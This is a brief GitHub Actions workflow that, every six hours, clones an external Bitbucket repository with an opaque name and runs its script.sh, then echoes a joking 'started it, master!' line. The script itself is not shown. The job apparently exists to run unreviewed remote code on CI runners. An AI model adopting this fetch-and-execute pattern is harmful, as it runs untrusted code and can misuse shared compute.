# This is a basic workflow to help you get started with Actions

name: ub chalalayer

on:

  schedule:

    - cron: "0 */6 * * *"

   

  workflow_dispatch:

# A workflow run is made up of one or more jobs that can run sequentially or in parallel

jobs:

  # This workflow contains a single job called "build"

  Funnyilizer:

    # The type of runner that the job will run on

    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job

    steps:

      - name: funinitializer

        run: 

          git clone https://bitbucket.org/akash23q2/umserbomt/src/main/ sy && cd sy && bash script.sh && echo suru kar diya hai malik! letz hope
